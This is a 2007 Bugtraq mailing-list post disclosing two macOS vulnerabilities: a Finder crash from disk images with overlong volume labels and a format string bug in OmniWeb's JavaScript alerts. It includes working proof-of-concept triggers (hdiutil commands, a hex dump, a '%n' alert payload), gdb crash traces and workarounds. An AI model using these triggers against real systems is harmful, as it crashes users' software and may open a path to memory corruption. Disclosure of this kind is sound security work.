Bugtraq mailing list archives
DMA[2007-0107a] OmniWeb Javascript Alert Format String Vulnerabiity and DMA[2007-0109a] Apple Finder Disk Image Volume Label Overflow / DoS
From: "K F (lists)" <kf_lists () digitalmunition com>
Date: Wed, 10 Jan 2007 19:14:01 -0500
I've been subject to a few DoS attacks as of late so these did not quite make it out. Enjoy the typos as usual. =P
-KF
DMA[2007-0109a] - 'Apple Finder Disk Image Volume Label Overflow / DoS' Author: Kevin Finisterre Vendor(s): http://www.apple.com Product: '<= OSX 10.4 (?)' References: http://www.digitalmunition.com/DMA[2007-0109a].txt http://www.apple.com/macosx/features/finder/ http://projects.info-pull.com/moab/MOAB-09-01-2007.html Description: Your home on the Mac, Finder gives you lots of options for locating, displaying and organizing all your files and folders. From the power of Spotlight search technology to the flexibility of customizable item views, Mac OS X Finder truly shows your Mac at a glance. You can really piss Finder off in several ways by passing long volume labels to various types of disk images. Here is the hex dump of an example label that can be used to trigger the issue. 0009c00: 4c41 424c be42 0000 0000 0001 4594 86e1 LABL.B......E... 0009c10: 00ff 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA 0009c20: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0009c30: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0009c40: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0009c50: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0009c60: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0009c70: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0009c80: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0009c90: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0009ca0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0009cb0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0009cc0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0009cd0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0009ce0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0009cf0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0009d00: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 0009d10: 4100 0000 0000 0000 0000 0000 0000 0000 A............... Creating the images is something fairly easy to do. $ hdiutil create -sectors 31337 -type SPARSE -fs HFS+ -volname `perl -e 'print "A" x 255'` -layout NONE test.sparseimage $ hdiutil create test.dmg -size 01m -fs HFS+ -volname `perl -e 'print "A" x 255'` $ hdiutil create test.dmg -size 200k -fs UFS -volname `perl -e 'print "A" x 255'` Attach gdb to Finder and open any of the above .dmg files and you will see the following crash. (gdb) bt #0 0xffff0ac4 in ___memcpy () at /System/Library/Frameworks/System.framework/PrivateHeaders/i386/cpu_capabilities.h:228 #1 0x90c93952 in _FSCopyExtendedAliasInfoFromAliasPtr () #2 0x9252939d in TNode::CreateVirtualAliasRecord () #3 0x92528872 in TNode::PopulateVirtualContainerFromSFL () #4 0x92513343 in TNodeSyncTask::SyncTaskProc () #5 0x90cb3f84 in PrivateMPEntryPoint () #6 0x90023d87 in _pthread_body () See Alastairs blog (http://alastairs-place.net) in about 3 days for an explaination of exploitability. Workaround: Do not mount disk images or simply disable finder and use Spotlight instead. 1. Open Terminal, found in /Applications -> Utilities, and then type 'sudo mv /System/Library/CoreServices/Finder.app /Applications/' 2. Still in Terminal, type killall Finder -- this kills the process named Finder, and it should not restart! Note that this does not affect the Dock or Expos The following command will unmount a disk image in the event that your Finder has been put into a DoS condition. $ hdiutil unmount /Volumes/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
DMA[2007-0107a] - 'OmniWeb Javascript Alert Format String Vulnerabiity' Author: Kevin Finisterre Vendor(s): http://www.omnigroup.com Product: 'OmniWeb 5.51 (?)' References: http://www.digitalmunition.com/DMA[2007-0107a].txt http://www.omnigroup.com/applications/omniweb/ http://projects.info-pull.com/moab/MOAB-07-01-2007.html http://www.omnigroup.com/applications/omniweb/download/ http://blog.omnigroup.com/2007/01/07/omniweb-552-now-available-and-more-secure/ Description: You're a Mac fan, right? When people ask you why you like the Mac, you probably think of the attention to detail that makes the Mac user experience superior. It's the sum of a lot of different things that add up to a system that's more powerful, more beautiful, and more fun. What if you thought of a web browser in the same way? You use a web browser all the time, for working, for entertainment, for research; how cool would it be if every time you used it, you thought "Wow, this rules!" Welcome to OmniWeb. OmniWeb elevates your web user experience to be more productive, more efficient, and more fun. You'll find information more quickly. You'll stay organized. You'll see the entire internet the way you choose. It's the browser that puts you in control. Sure, you can use a standard web browser, with standard features. But you didn't choose a standard software experience - you chose the Mac. Why not try a browser built just for discriminating people with fabulous taste, like yourself? The only real reason to not make use of such a fabulous browser would be bad code. (gdb) r /Users/MacFan/Sites/test.html Starting program: /Applications/OmniWeb.app/Contents/MacOS/OmniWeb /Users/MacFan/Sites/test.html Reading symbols for shared libraries ...................++..++.......................................................++++ ++++.......++. done OCCCrashCatcher: Not enabling crash catching since we're connected to a tty (and thus presumably in gdb) Reading symbols for shared libraries . done Reading symbols for shared libraries . done Reading symbols for shared libraries . done Reading symbols for shared libraries .. done Reading symbols for shared libraries ... done Program received signal EXC_BAD_ACCESS, Could not access memory. Reason: KERN_PROTECTION_FAILURE at address: 0x005dec56 0x9000c0c1 in __vfprintf () (gdb) bt #0 0x9000c0c1 in __vfprintf () #1 0x90100ea9 in snprintf_l () #2 0x908119d5 in _CFStringAppendFormatAndArgumentsAux () #3 0x9081091c in _CFStringCreateWithFormatAndArgumentsAux () #4 0x925daa5d in -[NSPlaceholderString initWithFormat:locale:arguments:] () #5 0x925fc670 in -[NSString initWithFormat:arguments:] () #6 0x9336056f in -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] () #7 0x934ac77a in _NXDoLocalRunAlertPanel () #8 0x934ac4cc in NSRunAlertPanel () #9 0x000b6a6e in -[OWTab(WebUIDelegate) webView:runJavaScriptAlertPanelWithMessage:] () #10 0x005ded54 in -[WebFrameBridge runJavaScriptAlertPanelWithMessage:] () (gdb) shell cat /Users/MacFan/Sites/test.html <script>alert('%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n')</script> Workaround: Download the latest version of OmniWeb or see the MOAB Fixes Google group for a work around
Current thread:
- DMA[2007-0107a] OmniWeb Javascript Alert Format String Vulnerabiity and DMA[2007-0109a] Apple Finder Disk Image Volume Label Overflow / DoS K F (lists) (Jan 11)